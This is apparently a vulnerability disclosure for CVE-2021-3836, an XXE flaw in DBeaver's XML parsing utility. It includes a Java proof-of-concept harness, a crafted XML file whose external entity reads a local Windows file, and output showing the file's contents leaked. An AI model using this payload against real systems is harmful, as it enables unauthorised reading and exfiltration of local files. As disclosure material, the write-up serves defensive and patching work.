Headline
CVE-2021-3836: Improper Restriction of XML External Entity Reference in dbeaver
dbeaver is vulnerable to Improper Restriction of XML External Entity Reference
✍️ Description
The dbeaver is vulnerable to XML External Entity (XXE). An attacker that is able to provide a crafted XML file as input to the parseDocument() function in the “XMLUtils.java” file may allow an attacker to execute XML External Entities (XXE), including exposing the contents of local files to a remote server.
🕵️♂️ Proof of Concept
package xxe_poc;
import java.io.File;
import org.jkiss.utils.xml.XMLException;
import org.jkiss.utils.xml.XMLUtils;
import org.w3c.dom.Document;
import org.w3c.dom.Element;
import org.w3c.dom.Node;
import org.w3c.dom.NodeList;
public class Poc {
public static void main(String[] args) {
File file = new File("C:\\Users\\[user]\\eclipse-workspace\\xxe_poc\\src\\main\\resources\\sample.xml");
Document doc;
try {
doc = XMLUtils.parseDocument(file);
doc.getDocumentElement().normalize();
NodeList nodeList = doc.getElementsByTagName("userInfo");
for (int itr = 0; itr < nodeList.getLength(); itr++) {
Node node = nodeList.item(itr);
System.out.println("\nNode Name :" + node.getNodeName());
if (node.getNodeType() == Node.ELEMENT_NODE) {
Element eElement = (Element) node;
System.out.println(
"Last Name: " + eElement.getElementsByTagName("lastName").item(0).getTextContent());
}
}
} catch (XMLException e) {
// TODO Auto-generated catch block
e.printStackTrace();
}
}
}
sample.xml
<!--?xml version="1.0" ?-->
<!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///c:/windows/win.ini"> ]>
<userInfo>
<firstName>John</firstName>
<lastName>&ent;</lastName>
</userInfo>
Check the Output:
Node Name :userInfo
Last Name: ; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1